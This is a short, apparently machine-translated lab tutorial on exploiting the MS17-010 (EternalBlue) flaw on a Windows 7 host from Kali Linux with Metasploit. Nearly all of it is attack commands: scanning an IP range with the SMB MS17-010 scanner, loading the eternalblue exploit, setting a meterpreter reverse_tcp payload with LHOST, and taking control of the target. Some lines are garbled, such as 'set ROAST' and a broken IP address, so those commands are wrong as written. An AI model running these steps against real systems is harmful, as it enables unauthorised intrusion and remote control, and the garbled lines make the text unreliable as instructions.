MS17_010 exploit Windows7

Attack the host system: Kali Linux 2018

Target host system: Windows7 x64

 

 

1. Host-initiated attack Metasploit:

 msfconsole 

 

 2. Find MS17_010 vulnerability-related information:

 search ms17_010 

Find the more than a few times to find

 

 3. Scan the four modules

Module II: Host probing whether there are loopholes in MS17_010

Module 3: Exploit

Module II MS17_010 use to detect vulnerabilities

 use auxiliary/scanner/smb/smb_ms17_010 

 

 4. Set ip ip range or target host wants probe (if you set up a single ip ip can, and here we show ip sweep range)

 set RHOSTS 192.168.48.125-192.168.48.135 

 

5. Start probe

 exploit

Echo [+] two not [*] on the host of the vulnerability exists

 

 6. After the detection of the target host, starting exploit module

 use exploit/windows/smb/ms17_010_eternalblue 

 

 7. Review the parameters to be set

 show options 

 

 8. View payloads:

 show payloads 

 

 9. Set the payload:

 set payload windows/x64/meterpreter/reverse_tcp 

 

 10. The set target host:

 set ROAST 192.168 . 48.130 

 

 11. The attack set the host:

 set LHOST 192.168.48.131 

 

12. began to attack:

 exploit or  run 

 

13. A successful attack using meterpreter control module to start the target host

 

 14. Review the information on the target host:

 sysinfo 

 

 

 

[Meterpreter command Detailed]

Guess you like

Origin www.cnblogs.com/Hunter-01001100/p/11626978.html